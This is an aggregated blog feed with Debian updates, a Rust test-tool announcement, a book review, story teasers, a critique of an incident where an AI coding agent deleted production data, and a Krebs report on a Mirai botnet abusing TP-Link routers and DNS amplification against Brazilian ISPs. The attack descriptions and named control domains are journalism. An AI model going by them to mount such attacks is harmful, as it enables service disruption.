Jer then tries to ensure that Cursor takes some of the blame, pointing to Cursor's "guardrails" documentation. Except, here, the documentation is actually quite explicit about what those guardrails guarantee. If you're using a first-party tool, it will prohibit unsafe operations. When using 3rd party MCPs, like Railway's, the only guardrail is that it requires human approval for every action- unless you update your allowlist for that MCP. If you put them in your allowlist, the guardrails go away. Jer argues that tools should enforce more protection against LLM behaviors, but the problem with that is people- like the PocketOS team- turn those protections off. And like a lot of safety mistakes, they can get away with it all the way up until the point where they can't.

Jer follows this by listing off a pile of other times using Cursor has caused disasters, which isn't making the argument he thinks it is: yes, Cursor is dangerous, but those dangers are well known. It makes the choice to turn Cursor loose without strict supervision seem even more foolish.

Jer writes:

For now I want this incident understood on its own terms: as a Cursor failure, a Railway failure, and a backup-architecture failure that all happened to one company in one Friday afternoon.

It's also a PocketOS failure. It's a failure to properly assess the tools and environments you chose to use for your product. A failure to read and understand the docs for vital features, like *backups*. A failure to employ even the most basic safeguards. A failure to put a second's thought into key management- even if that key was only for DNS entries, you still shouldn't chuck it in source control. A failure to have a competent backup strategy. It's worth noting that they did restore from a three month old backup, which means they were at one point taking backups outside of Railway's volume setup. That was a wise decision. That they stopped is a failure.

The first rule of disaster retrospectives is that it's never one piece that's the failure. It's never one person's fault, one tool's fault, one vendor's fault. It's a systemic failure. Railway's keys should be finer grained. But also, you shouldn't leave keys lying around. Deleting backups when you delete the volume is a terrible idea, but having only one service for backups (that's also your primary site) is a terrible idea. Claude's ability to enforce its own guardrails should be better, but LLMs are notoriously dangerous about this: you should know better, and by your own words you did.

This is not an anti-AI post, or even a "get a load of this asshole" post. It is a "understand the damn tools you're using" post. Be critical of them. Don't trust them. Ever. Especially LLMs, because the worst part of an LLM is that it takes away the one thing computers used to be good at: predictable, deterministic behavior. But not just LLMs: don't trust your cloud provider, don't trust your infrastructure manager. Dig into them and understand how they work, and if they seem too complicated to understand, then they may be too complicated to trust.

Update: As pointed out in the featured comment below, Railway did finally get a backup restored. So they got their data back. Yay? From the post, Jer remains committed to making this a Railway issue and not a PocketOS issue.

[Advertisement] Picking up NuGet is easy. Getting good at it takes time. Download our guide to learn the best practice of NuGet for the Enterprise.

365 TomorrowsThe Night the Calamity Came Back

Author: Julian Miles, Staff Writer “Don’t do that, Will!” “Got to try something, Len.” Those words ended the final transmission from the Champion, one of the colony ships that established our ancestors on the planet of Mireybrul. The transmission ended because the ship collided with Mermyd, the smaller of our two moons, and disintegrated in […]

The post The Night the Calamity Came Back appeared first on 365tomorrows.

Planet DebianRuss Allbery: Review: Full Speed to a Crash Landing

Review: Full Speed to a Crash Landing, by Beth Revis

Series: Chaotic Orbits #1
Publisher: DAW
Copyright: August 2024
ISBN: 0-7564-1947-6
Format: Kindle
Pages: 153

Full Speed to a Crash Landing is a science fiction novella and the first of a series. Beth Revis made the New York Times bestseller list for an earlier series of young adult science fiction novels, but somehow I had not heard of her before this series.

Ada Lamarr is a salvager. She picks up material from crashed or dead ships for resale. As the story opens, she has a large hole in the side of her ship, she's running out of oxygen, and the other ship nearby is refusing to answer her distress call. By the time they finally respond, there is barely enough time to get aboard before she is entirely out of air.

Ada's first-person narration drops hints that she may not be entirely what she seems. But then, neither is the Halifax, so it's only fair.

The captain of the Halifax treats Ada with a great deal of suspicion and wants her out of the way of their ongoing salvage operation. However, the captain does not appear to be entirely in charge. Ada is immediately struck by the mysterious Rian White, who seems to have some authority over their mission and is more thoughtful and calculating than the rest of the crew. He's also handsome, which doesn't hurt.

I was tempted to keep writing about the plot, but given the short length of this book, I should stop there and let you enjoy the twists and turns for yourself. This is a fun science fiction action romp: lots of banter, lots of tense moments, and a cagey first-person protagonist with an irrepressible sense of humor and a knack for brazening her way through conversations. It's not long on world-building (there isn't enough room), but Revis works in enough details to be intriguing and to set up some interesting motivations.

This is the sort of book that lives and dies by how much you like the protagonist, something that you will easily figure out by the end of an ebook sample if you're the sort of reader who uses those. Ada is irreverent, talkative, and very adroit at diverting attention (entertainingly) onto anything other than the critical piece of information other people are missing. If you want to, I suspect you could easily figure out most of what Ada is up to before the book reveals it explicitly. It's not that complicated, and the book isn't really trying to hide, although it doesn't give you all the necessary information in advance. Personally, I was happy to sit back and enjoy the ride.

There is no romance in this book beyond frequent comments from Ada that she would have liked there to be a romance in this book under different circumstances, but I will be surprised if that romance doesn't show up later in the series. Ada and Rian are clearly being set up as a pair. I didn't like Rian as much, mostly because he's less memorable as a character, but he comes into his own in the appendices after the plot proper.

I thought those concluding appendices were the best part of the novella and question the Kindle formatting decision to treat them like supplemental material. They purport to be a series of government memos, fill in a lot more of the backstory and world building, and have the best footnotes. Don't skip them!

This isn't the sort of book that I am inspired to immediately push into everyone's hands, but it's a fast, well-paced story that delivered a few reading sessions of entertainment. I'm not sure the political philosophy in the background makes a lot of sense, but at least it's not the standard stereotype of current politics seen in so much science fiction. It's going to set up some interesting character conflict in later books. I'm certainly intrigued enough to keep reading.

Recommended when you're in the mood for some fast-paced fun that's short and undemanding.

Followed by How to Steal a Galaxy.

Rating: 7 out of 10

,

Rondam RamblingsBig News: The Plausibility of Abiogenesis Has Been Experimentally Demonstrated

From earliest recorded history mankind has wondered how life on earth first arose.  The current diversity of life on earth is spectacularly well-explained by Darwinian (or Dawkinsian) evolution, the process of replication with random variation plus natural selection.  Things that are better at making copies of themselves make more copies.  What makes something better at

Cory DoctorowComrade Trump

A Soviet propaganda poster featuring Lenin pointing angrily into the distance. It has been altered. Lenin now has Trump's hair and his skin in orange. The hammer/sickle logo behind him has been replaced with a cross.

This week on my podcast, I read Comrade Trump, a recent column from my Pluralistic newsletter, which will be syndicated in The Nerve.


All of which means that my experience of the Trump years is decidedly weird. On the one hand, I exist in a near-perpetual state of anxious misery, as Trump and his chud army of Christian nationalists and degenerate gamblers pursue a program of gleeful genocide. But at the very same time, I’m living in a world in which Trump is (inadvertently) dismantling many of the worst aspects of the old order in favor of something decidedly better.

Take Trump’s tariff policy. Back during Trump I, he decided that Americans couldn’t buy Chinese solar anymore, which had the double benefit of allowing him to pursue the twin goals of throwing red meat to Sinophobic Cold War 2.0 freaks and delivering a giant gift to the planet-wrecking oil companies that had helped him buy his way into office.

MP3

Planet DebianEmmanuel Kasper: Arm64 Linux Desktop: one year after, all systems up

So I have been using Debian on a System76 Arm64 (aarch64) workstation for nine months now, and I can say: everything works. It should be noted that I use very little proprietary software, so I rely mostly on Debian packages for what I am doing. What I can say is that basically all open source software that exists today takes care to build on aarch64 or is available as a binary, either in the Debian archive, in a Flatpak or Snap, or in a GitHub artefact. From 3D games to Kubernetes tooling, practically everything open source is compiled for aarch64 Linux as well. The same goes for server software: every container image built today also provides an aarch64 binary.

I was also able to add a standard PCI Express Soundblaster sound card, and the kernel recognized it without issues.

The major downside is that Wayland does not work on my Nvidia GPU, whether with Nouveau or the proprietary drivers, so I am using Gnome with X11. Also on the proprietary side, I missed the Discourse client, but I do not use it much, and those video meeting tools that popped up during the COVID era are perfectly usable in the browser.

For me, the situation is much better than in the 2000s, when I used a Mac Mini (PowerPC) with Debian and the need for a Flash player really limited the amount of online content I could access.

What do I get from using aarch64, you ask? The main reason for me was curiosity about using a non-x86 arch, and having an 80-core / 128 GB RAM machine to do a Lab in a Box with OpenShift running on OpenStack, with Ceph and a bit of local LLM inference thrown in. In the end I have enough labs at work, so that need disappeared, but I still enjoy having that amount of power in a rather quiet machine drawing a standard 80 W.

Planet DebianJelmer Vernooij: Inquest, a test result repository in Rust

testrepository

For a long time I’ve used Robert Collins’ testrepository (testr) to run tests in many of the projects I work on. It’s a small, focused tool built around a simple idea: decouple the running of tests from the recording and querying of their results.

The way it works is straightforward. A test runner emits a subunit stream — a compact binary protocol for test results — and testrepository stores those streams in a per-project .testrepository/ directory. Once results are in the repository, you can ask questions like “which tests failed in the last run?”, “re-run only the failures”, “what are the slowest tests?”, or “what changed between this run and the previous one?”.

The killer feature, for me, has always been the failing-test loop. When a big test suite breaks, you don’t want to re-run the whole thing after every fix — you want to iterate on just the failures, and only re-run the full suite once they’re all green. testrepository made that workflow ergonomic long before most language-specific test runners had anything comparable, and many of them still don’t have a good answer for it.
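
From memory, the loop with testr itself looked roughly like this (command names recalled from years of use, so treat it as a sketch rather than a transcript):

 $ testr run             # run the full suite and record the results
 $ testr failing         # list the tests that failed in that run
 $ testr run --failing   # re-run only the failures, repeat until green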

testrepository has served me well for over a decade, but it has been largely unmaintained for a while, and I had some ideas of improvements that I wanted to try out. So I wrote a Rust port, which has since grown a number of features of its own.

Inquest

Inquest is a Rust port of testrepository that has since grown a number of features of its own. The binary is called inq.

Goals

The goals are deliberately modest:

  • a single static binary, no Python runtime required
  • no need to write a dedicated config file for most projects
  • compatible enough with testrepository’s workflow that I can switch projects over without retraining my fingers
  • a richer on-disk format that captures more about each run (git commit, command line, duration, exit code, concurrency)
  • good support for the languages I actually use day-to-day: Rust, Python, Go, and Node.js
  • mostly Do What I Mean (DWIM), e.g. letting me know as quickly as possible which tests are failing and why, and being clever about how it does that

Inquest reads and writes subunit v2 streams, so anything that can produce subunit (directly or via one of the many converters) can feed into it.

Quick start

Inquest can usually figure out how to run your tests on its own. In a Rust, Python, Go or Node.js project:

 $ cd my-project
 $ inq

Or if the auto-detection doesn’t work, you can ask it to generate a config file and then run the tests:

 $ inq auto
 $ inq run

inq auto writes an inquest.toml describing how to invoke the test runner; inq run runs the tests, captures the subunit stream, and stores the results in a .inquest/ directory.

For a Rust project the generated config looks like:

 test_command = "cargo subunit $IDOPTION"
 test_id_option = "--test $IDFILE"
 test_list_option = "--list"
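
For comparison, I would expect the generated config for a Python project to look something along these lines — a sketch only, borrowing the command and placeholders from testrepository's conventions rather than from inquest's documentation:

 test_command = "python -m subunit.run discover . $LISTOPT $IDOPTION"
 test_id_option = "--load-list $IDFILE"
 test_list_option = "--list"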

After the first run, the usual queries work:

 $ inq stats             # repository-wide statistics
 $ inq last              # results of the most recent run
 $ inq failing           # only the failing tests
 $ inq slowest           # the slowest tests in the last run
 $ inq run --failing     # re-run only what failed last time

The last one is the workflow I use most often: run the full suite once, fix the obvious failures, then iterate on inq run --failing until the list is empty.

A few things that aren’t in testrepository

Some of the features that have grown in inquest beyond the original testrepository functionality:

  • Timeouts. --test-timeout, --max-duration, and --no-output-timeout will kill a test process that is hanging or has stopped producing output. --test-timeout auto derives a per-test timeout from the historical duration of that test, which is handy for catching tests that hang.

    Once the test runner is killed, the test is marked as failed and the next test is started, so a broken test doesn’t hold up the whole suite.

  • Ordering --order can be used to run tests in a specific order, e.g. to run the slowest tests first, to run the tests that failed most recently first, or to run the widest variety of tests first to maximize the chance of finding a failure early on.

  • Live progress. inq running tails the in-progress subunit stream on disk and reports observed/expected test counts, percent complete, elapsed wall-clock time, and an ETA derived from each test’s historical duration. Useful when a CI run is taking longer than you’d like.

  • Flakiness ranking. inq flaky ranks tests by pass↔fail transitions in consecutive runs in which the test was recorded, so chronically broken tests rank low and genuinely flapping tests rank high.

  • Comparing runs. inq diff <A> <B> shows what changed between two test runs — newly failing, newly passing, and tests that flipped state — which makes it easy to see whether your last change actually fixed (or broke) anything.

  • Bisecting git history. inq bisect <TEST> drives git bisect to find the commit that broke a given test. It defaults the known-good and known-bad commits from the recorded run history (the most recent run where the test passed, and the most recent where it failed), so in the common case there is no need to remember either — just point it at the test name and let it work.

  • Richer run metadata. inq info shows the git commit, command line, duration, exit code, and concurrency for a run, with a flag for whether the working tree was dirty when the run started. Combined with inq diff this makes it much easier to triangulate when a regression was introduced.

  • Rerun a previous run verbatim. inq rerun <ID> re-runs exactly the tests of a previous run, in the same order, forwarding the same -- arguments that the original run used. inq rerun -1 repeats the latest.

  • Web based view. inq web serves a web-based view of the repository, with a dashboard of recent runs and detailed views of individual runs and tests.

Web UI

Most of the time I drive inquest from the command line, but for browsing historical results of a large suite — spotting flapping tests, drilling into a single test’s run history, or just getting a visual sense of which parts of the suite are hurting — a web view is more pleasant. inq web starts a local server with exactly that:

 $ inq web

The repository overview shows totals and a per-test history grid where each cell is one run, coloured by outcome. Bands of red make it easy to pick out tests that have been broken for a long time, and isolated red cells in an otherwise green column point at flaky tests.

Inquest web UI repository overview, with a grid of per-run results

Drilling into an individual test gives you its full run history, a duration sparkline, and per-run pass/fail status:

Inquest web UI per-test view with run history and duration sparkline

Migrating from testrepository

If you already have a .testrepository/ directory full of historical runs, inq upgrade will migrate it into the new .inquest/ format, with a progress bar for the impatient.

The legacy .testr.conf (INI) format is still understood, so existing projects don’t have to be converted to inquest.toml immediately — though the TOML format is preferred for new projects.
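
For reference, a typical legacy .testr.conf for a Python project looks roughly like this (quoted from memory of testrepository's conventions, so the details may differ slightly from any given project):

 [DEFAULT]
 test_command=python -m subunit.run discover . $LISTOPT $IDOPTION
 test_id_option=--load-list $IDFILE
 test_list_option=--list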

Trying it

The source is on GitHub at jelmer/inquest. To install from source:

 $ cargo install inquest

In a project with a Rust, Python, Go or Node.js test suite:

 $ inq

Bug reports and patches are welcome.

Planet DebianBirger Schacht: Status update, February - April 2026

Due to health reasons I did not have the energy to write individual status updates for February & March, so I’ll just combine them with the April update:

In February I cleaned out my GitHub account and moved all remaining projects to Codeberg. I archived the repositories on GitHub and added links to the new repositories on Codeberg. GitHub is a platform that is more and more frustrating to use. I still have to use it for my day job, though. The number of pull requests and issues that are written either by bots or by users that use bots has increased over the last two years. Combined with that, GitHub provides a very low barrier for entitled users who do not want to contribute to a productive environment. GitHub now feels like the Twitter/X of git forges. Codeberg, on the other hand, is a community project. I feel a lot more at home there, and the platform itself feels a lot more responsive than GitHub.

Debian Related Work

  • Uploaded wayback 0.3-1 to experimental
  • Uploaded slurp 1.6.0-1 to unstable
  • Uploaded first a prerelease of sway to experimental to be able to test wlroots 0.20.0 and then uploaded rc1, rc2 and rc3 of the upcoming 1.12 release
  • Uploaded waybar 0.15.0-1 to unstable
  • Uploaded kanshi 1.9.0-1 to unstable, which was possible because the dependency libscfg finally went through NEW
  • Uploaded libscfg 0.2.0-1 to unstable
  • Uploaded swaybg 1.2.2-1 to unstable
  • Uploaded labwc 0.9.4-1, 0.9.5 & 0.9.6 to unstable
  • Fixed the packaging of vali and uploaded version 0.1.1-1 to unstable; then added vali to the build dependencies of kanshi and reuploaded 1.9.0-2 thereof
  • Uploaded swaylock 1.8.5-1 to unstable
  • Uploaded fcft 3.3.3-1 to unstable
  • Uploaded foot 1.26.1-1 to unstable
  • Uploaded swayimg 5.0-1 and 5.1-1 to unstable
  • Fixed some packaging metadata in libsfdo and uploaded 0.1.4-2 to unstable
  • Reverted the upload of slurp from 1.6.0-1 to 1.6.0really1.5.0-1 because the upstream release of 1.6.0 was made by mistake and yanked a week later. Maybe I should add a cooldown period before uploading new releases ;)
  • Uploaded mako-notifier 1.11.0-1 to unstable
  • Uploaded cage 0.3.0-1 to experimental which uses wlroots 0.20.0
  • Uploaded xdg-desktop-portal-wlr 0.8.2-1 to unstable
  • Voted

DH Related Work

I took part in the DHD 2026 Conference in Vienna, including a hands-on workshop of the dhinfra project.

I released 0.60.0, 0.61.0 and 0.62.0 of apis-core-rdf. We rewrote the configuration format for the importer. We previously used TOML files, but that does not give us inheritance. So we now simply use Python classes as the configuration format.

I implemented a new backend for our apis-bibsonomy Django package. The package is meant to provide a data model for storing reference data that links to Bibsonomy or Zotero. Given that we don't use Bibsonomy anymore, we have now dropped the Bibsonomy backend and added a Zotero backend that allows the entries to be cached locally.

365 TomorrowsThe Ghostwriter

Author: Hugh J. O’Donnell I woke up in a hospital room that smelled like bleach and bad coffee. There was a woman sitting at the foot of my bed. Emma, my agent. But something seemed not quite right. “What happened?” I managed. Emma stood and came closer. She looked terrible. “You were in a car […]

The post The Ghostwriter appeared first on 365tomorrows.

,

Planet DebianBits from Debian: Debian welcomes the 2026 GSoC interns

GSoC logo

We are very excited to announce that Debian has been assigned seven contributors to work under mentorship on a variety of projects with us during the Google Summer of Code.

Here is a list of the projects and contributors, along with details of the tasks to be performed.


Project: Automated Debian Packaging with debianize

  • Contributor: Anurag Nayak

Deliverables of the project: Debianize is a tool that aims to automatically create Debian packages from scratch from upstream source trees. In its current version it works for some packages, but it is not reliable. This project aims at making it production-ready so that it works with most projects, along with improving its reliability, coverage, integration with the broader ecosystem, and other enhancements.


Project: Linux Livepatching

  • Contributor: Aryan Karamtoth

Deliverables of the project: Linux Kernel Livepatching is the process of replacing functions in the kernel code affected by CVEs with the patch-applied functions during system runtime. It's basically a method to apply security kernel patches to a running system.


Project: DebNet: Visualising the Bus Factor – Graph Analysis of Debian's Infrastructure

  • Contributor: Fabio Ruhland

Deliverables of the project: DebNet models the Debian archive as a graph to identify critical packages maintained by too few people. Using data from the Ultimate Debian Database (UDD), it builds a package dependency graph and a maintainer-package graph to compute practical metrics like the Bus Factor, Fragility Score, and Dependency Impact for every source package.


Project: Attack of the Clones: Fight Back Using Code Duplication Detection From Security Patches

  • Contributor: Gajendra Nath Soren

Deliverables of the project: This project aims to detect vulnerable code clones in the Debian archive by automatically extracting signatures from security patches. Using a two-signal approach that separates vulnerable patterns from fix patterns, the system generates high-specificity queries to search the entire archive via Debian CodeSearch.


Project: Debusine: debuginfod server

  • Contributor: Jugal59

Deliverables of the project: This project implements a debuginfod-compatible server within Debusine to provide automated debug symbol resolution for Debian developers.


Project: Debian-LSP: Improve File Format Support

  • Contributor: Lucas Ly Ba

Deliverables of the project: The Debian LSP Language Server currently provides only basic features—field completion, parse-error diagnostics, and simple quick fixes—leaving Debian maintainers without the rich IDE experience available in other ecosystems.


Project: Debusine: live log streaming

  • Contributor: mo-ashraf

Deliverables of the project: Debusine currently only shows task logs after a task has fully completed. This means developers working with long-running jobs (such as package builds or test pipelines) have no way to monitor progress in real time or catch failures early. This project adds live log streaming to Debusine.


Congratulations and welcome to all the contributors!

The Google Summer of Code program is possible in Debian thanks to the efforts of Debian Developers and Debian Contributors that dedicate part of their free time to mentor contributors and outreach tasks.

Join us and help extend Debian! You can follow the contributors' weekly reports on the debian-outreach mailing-list, chat with us on our IRC channel or reach out to the individual projects' team mailing lists.

Planet DebianBen Hutchings: FOSS activity in April 2026

365 TomorrowsThe Big Picture

Author: James Gonda At the hotel in West Texas, a low structure with a lobby that smells of citrus and air conditioning, I unpack my bag: one pair of walking shoes (the soles caked with dust from Jordan), three dress shirts, a pack of almonds, and a paperback, its bookmark a receipt from the Reykjavík […]

The post The Big Picture appeared first on 365tomorrows.

,

Planet DebianDirk Eddelbuettel: binb 0.0.8 on CRAN: Maintenance

The eighth release of the binb package, and the first in two years, is now on CRAN and in r2u. binb regroups four rather nice themes for writing LaTeX Beamer presentations much more easily in (R)Markdown. As a teaser, a quick demo combining all four themes is available; documentation and examples are in the package.

This release contains the usual internal updates to continuous integration and URL references, plus a switch to Authors@R. The trigger for the release, though, was a small update needed when very recent pandoc versions (as shipped with RStudio) are used, which require a new variable declaration in the LaTeX template files in order to process uncaptioned tables. The summary of changes follows.

Changes in binb version 0.0.8 (2026-05-01)

  • Small updates to documentation URLs and continuous integration

  • The package now uses Authors@R in DESCRIPTION

  • Newer pandoc versions are accommodated by adding a required counter variable in the latex template file

CRANberries provides a summary of changes to the previous version. For questions or comments, please use the issue tracker at the GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub. You can also sponsor my Tour de Shore 2026 ride in support of the Maywood Fine Arts Center.

Cryptogram A Ransomware Negotiator Was Working for a Ransomware Gang

Someone pleaded guilty to secretly working for a ransomware gang as he negotiated ransomware payments for clients.

365 TomorrowsSubmerged Worlds

Author: Zoe Lin Pal 100 years ago, the world was lost to the sea. Glaciers, once frozen in time, collapsed into rising tides, swallowing cities whole. Only a fraction of humanity remains, building lives on the edges of what the water has spared. The ocean took everything. And still, it kept secrets. – – – […]

The post Submerged Worlds appeared first on 365tomorrows.

Worse Than FailureError'd: Parametric Projection

Roger C. gets on second base with an unforced error. "Not only is the content too large, the error message informing us of this is also too large to fit the visible space. A layered, double WTF."

"AWS Spellcheck Fail!" alerts Peter "If only someone at AWS knew the correct paramters to activate the spellcheck."

"How long is too long for a job to be open? " wonders Lincoln K. "I didn't even know LinkedIn existed 61 years ago, let alone was accepting postings... Though only 81 applicants in that time is hardly an impressive turn-out." For a "Vice President Operations and Quality Control", no less.

An anonymous Richard reports "This came through my door. On a card that, in order to get to my door, had my full address printed on it, including my ."

Oenophile Abroad Michael R. shares "My Macbook broke after being "exposed" to red wine. As a German in London it pleases me so see that the repair shop offers this time granularity."

[Advertisement] Keep all your packages and Docker containers in one place, scan for vulnerabilities, and control who can access different feeds. ProGet installs in minutes and has a powerful free version with a lot of great features that you can upgrade when ready.Learn more.

Planet DebianReproducible Builds (diffoscope): diffoscope 318 released

The diffoscope maintainers are pleased to announce the release of diffoscope version 318. This version includes the following changes:

[ Chris Lamb ]
* Upload to test PyPI integration.
* Bump Standards-Version to 4.7.4.

[ Manuel Jacob ]
* Remove a misleading comment.

You find out more by visiting the project homepage.

,

Planet DebianSergio Cipriano: My experience at MiniDebConf Campinas 2026

My experience at MiniDebConf Campinas 2026

Last week, I spent the entire week in Campinas attending MiniDebConf and MiniDebCamp. The Debian Brazil community organizes this event every year, and this year's edition was the biggest so far.

During MiniDebCamp, I sponsored a few uploads and spent two days teaching packaging to two participants. I usually teach packaging online, so it was refreshing to do it in person. I believe the experience was much better than teaching online.

One of my mentees introduced me to the DDTSS (Debian Distributed Translation Server Satellite). Even though there are many i18n contributors in Brazil, this was my first time learning about this system. I plan to contribute to translations over the next few weeks using DDTSS.

My Activities

NOTE: I translated every talk title; the original titles are in PT-BR, so some details may have been lost in translation.

I presented three talks and led one BoF session. The talks are all available on Debian's Peertube:

You can also find my slides at people.d.o.

My first talk was a showcase of dh-make-vim, a tool I created and have been using for a few months. Some people tested it and found bugs, which was really nice to see.

My second talk was essentially a live version of my blog post Zero-Code Instrumentation of an Envoy TCP Proxy using eBPF.

I also gave a lightning talk about something many people are not aware of: non-uploading DDs can also sponsor uploads.

If you're interested, this bug report provides more context: tracker.debian.org: Signed by field is missing when sponsoring as DD non-uploading

Finally, I led the BoF session "Experiences, lessons learned, and next steps from the mentoring sessions". This was my favorite session; we had many participants with different perspectives and ideas, which led to a very engaging discussion. I'm still working on the action plans and I plan to release them soon.

Here are some photos of these activities:

Mentorship BoF

Mentorship BoF

DD non-uploading can upload talk

dh-make-vim showcase

Zero-Code Instrumentation showcase

My favorite activities

This is a list, in no particular order, of some of the sessions I enjoyed the most:

  • Salsa CI, showing features that almost nobody knows

    I wrote a blog post about one of the things I learned in this talk, and there is still a lot more to explore. Aquila Macedo is developing many cool features in Salsa CI.

  • Free Software: Freedom, Autonomy, Sovereignty

I had been really looking forward to this one. Alexandre Oliva is a very important figure in the Free Software movement, especially in South America. I'll need to rewatch it; my future talks about Free Software will likely be inspired by this one.

  • What I've lived/seen in 33 Years of Debian & Free Software in general

    Eduardo Maçan was the first Debian Developer in Brazil, so it's always valuable to hear the story from someone who was part of it.

  • Symbolism - an introduction

    Despite the title, this talk was not about astrology! I'll probably rewatch it as well, as there is a lot of information to take in. I really like the passion Sérgio Durigan has for C. He is also a great speaker and knows how to guide the audience through the topic.

  • Debate: Contemporary controversies in Debian

    The debate itself was great, but the conversations we had afterward were even better. I changed some of my opinions after hearing different perspectives. I don't think this format would work at DebConf, but I would definitely like to attend another one like this.

  • Why LTS on Debian?

    I had a few questions about LTS, and Kanashiro and Santiago answered them both during the talk and in the Q&A session. They also shared some challenges and how to avoid them, it was a great learning experience.

  • From my first contribution to the Debian Maintainer

    Polkorny was a bit shy but did a great job! I really enjoy this kind of talk. It is always nice to see the different paths people take.

Unfortunately, as always, I couldn't attend everything I was interested in.

DayTrip - The Brazilian Particle Accelerator

Sirius is the largest and most complex scientific infrastructure ever built in Brazil and one of the most advanced synchrotron light sources in the world. My jaw dropped the entire time; it's hard to describe how incredible this is.

My favorite detail: they're running Debian :)

Wrap up

I believe this was the best MiniDebConf Brazil so far. There were many other things I chose not to include here, as this post is already quite long. Still, here are a few more highlights:

  • A Bug Squashing Party
  • Driving Samuel Henrique's drones
  • Lots of capybaras
  • A small birthday party
  • A visit to two data centers

Krebs on SecurityAnti-DDoS Firm Heaped Attacks on Brazilian ISPs

A Brazilian tech firm that specializes in protecting networks from distributed denial-of-service (DDoS) attacks has been enabling a botnet responsible for an extended campaign of massive DDoS attacks against other network operators in Brazil, KrebsOnSecurity has learned. The firm’s chief executive says the malicious activity resulted from a security breach and was likely the work of a competitor trying to tarnish his company’s public image.

An Archer AX21 router from TP-Link. Image: tp-link.com.

For the past several years, security experts have tracked a series of massive DDoS attacks originating from Brazil and solely targeting Brazilian ISPs. Until recently, it was less than clear who or what was behind these digital sieges. That changed earlier this month when a trusted source who asked to remain anonymous shared a curious file archive that was exposed in an open directory online.

The exposed archive contained several Portuguese-language malicious programs written in Python. It also included the private SSH authentication keys belonging to the CEO of Huge Networks, a Brazilian ISP that primarily offers DDoS protection to other Brazilian network operators.

Founded in Miami, Fla. in 2014, Huge Networks centers its operations in Brazil. The company originated from protecting game servers against DDoS attacks and evolved into an ISP-focused DDoS mitigation provider. It does not appear in any public abuse complaints and is not associated with any known DDoS-for-hire services.

Nevertheless, the exposed archive shows that a Brazil-based threat actor maintained root access to Huge Networks infrastructure and built a powerful DDoS botnet by routinely mass-scanning the Internet for insecure Internet routers and unmanaged domain name system (DNS) servers on the Web that could be enlisted in attacks.

DNS is what allows Internet users to reach websites by typing familiar domain names instead of the associated IP addresses. Ideally, DNS servers only provide answers to machines within a trusted domain. But so-called “DNS reflection” attacks rely on DNS servers that are (mis)configured to accept queries from anywhere on the Web. Attackers can send spoofed DNS queries to these servers so that the request appears to come from the target’s network. That way, when the DNS servers respond, they reply to the spoofed (targeted) address.

By taking advantage of an extension to the DNS protocol that enables large DNS messages, botmasters can dramatically boost the size and impact of a reflection attack — crafting DNS queries so that the responses are much bigger than the requests. For example, an attacker could compose a DNS request of less than 100 bytes, prompting a response that is 60-70 times as large. This amplification effect is especially pronounced when the perpetrators can query many DNS servers with these spoofed requests from tens of thousands of compromised devices simultaneously.

A DNS amplification attack, illustrated. It shows an attacker on the left, sending malicious commands to a number of bots to the immediate right, which then make spoofed DNS queries with the source address as the target's IP address.

A DNS amplification and reflection attack, illustrated. Image: veracara.digicert.com.

The exposed file archive includes a command-line history showing exactly how this attacker built and maintained a powerful botnet by scouring the Internet for TP-Link Archer AX21 routers. Specifically, the botnet seeks out TP-Link devices that remain vulnerable to CVE-2023-1389, an unauthenticated command injection vulnerability that was patched back in April 2023.

Malicious domains in the exposed Python attack scripts included DNS lookups for hikylover[.]st, and c.loyaltyservices[.]lol, both domains that have been flagged in the past year as control servers for an Internet of Things (IoT) botnet powered by a Mirai malware variant.

The leaked archive shows the botmaster coordinated their scanning from a Digital Ocean server that has been flagged for abusive activity hundreds of times in the past year. The Python scripts invoke multiple Internet addresses assigned to Huge Networks that were used to identify targets and execute DDoS campaigns. The attacks were strictly limited to Brazilian IP address ranges, and the scripts show that each selected IP address prefix was attacked for 10-60 seconds with four parallel processes per host before the botnet moved on to the next target.

The archive also shows these malicious Python scripts relied on private SSH keys belonging to Huge Networks’s CEO, Erick Nascimento. Reached for comment about the files, Mr. Nascimento said he did not write the attack programs and that he didn’t realize the extent of the DDoS campaigns until contacted by KrebsOnSecurity.

“We received and notified many Tier 1 upstreams regarding very very large DDoS attacks against small ISPs,” Nascimento said. “We didn’t dig deep enough at the time, and what you sent makes that clear.”

Nascimento said the unauthorized activity is likely related to a digital intrusion first detected in January 2026 that compromised two of the company’s development servers, as well as his personal SSH keys. But he said there’s no evidence those keys were used after January.

“We notified the team in writing the same day, wiped the boxes, and rotated keys,” Nascimento said, sharing a screenshot of a January 11 notification from Digital Ocean. “All documented internally.”

Mr. Nascimento said Huge Networks has since engaged a third-party network forensics firm to investigate further.

“Our working assessment so far is that this all started with a single internal compromise — one pivot point that gave the attacker downstream access to some resources, including a legacy personal droplet of mine,” he wrote.

“The compromise happened through a bastion/jump server that several people had access to,” Nascimento continued. “Digital Ocean flagged the droplet on January 11 — compromised due to a leaked SSH key, in their wording — I was traveling at the time and addressed it on return. That droplet was deprecated and destroyed, and it was never part of Huge Networks infrastructure.”

The malicious software that powers the botnet of TP-Link devices used in the DDoS attacks on Brazilian ISPs is based on Mirai, a malware strain that made its public debut in September 2016 by launching a then record-smashing DDoS attack that kept this website offline for four days. In January 2017, KrebsOnSecurity identified the Mirai authors as the co-owners of a DDoS mitigation firm that was using the botnet to attack gaming servers and scare up new clients.

In May 2025, KrebsOnSecurity was hit by another Mirai-based DDoS that Google called the largest attack it had ever mitigated. That report implicated a 20-something Brazilian man who was running a DDoS mitigation company as well as several DDoS-for-hire services that have since been seized by the FBI.

Nascimento flatly denied being involved in DDoS attacks against Brazilian operators to generate business for his company’s services.

“We don’t run DDoS attacks against Brazilian operators to sell protection,” Nascimento wrote in response to questions. “Our sales model is mostly inbound and through channel integrator, distributors, partners — not active prospecting based on market incidents. The targets in the scripts you received are small regional providers, the vast majority of which are neither in our customer base nor in our commercial pipeline — a fact verifiable through public sources like QRator.”

Nascimento maintains he has “strong evidence stored on the blockchain” that this was all done by a competitor. As for who that competitor might be, the CEO wouldn’t say.

“I would love to share this with you, but it could not be published as it would lose the surprise factor against my dishonest competitor,” he explained. “Coincidentally or not, your contact happened a week before an important event – ​​one that this competitor has NEVER participated in (and it’s a traditional event in the sector). And this year, they will be participating. Strange, isn’t it?”

Strange indeed.

Planet DebianRussell Coker: Links April 2026

Charles Stross wrote an interesting blog post about the apparent desire of super rich people to kill the poor, it seems that the people in power want to make all the conspiracy theories come true [1].

Wouter wrote an insightful blog post about the need for free firmware [2].

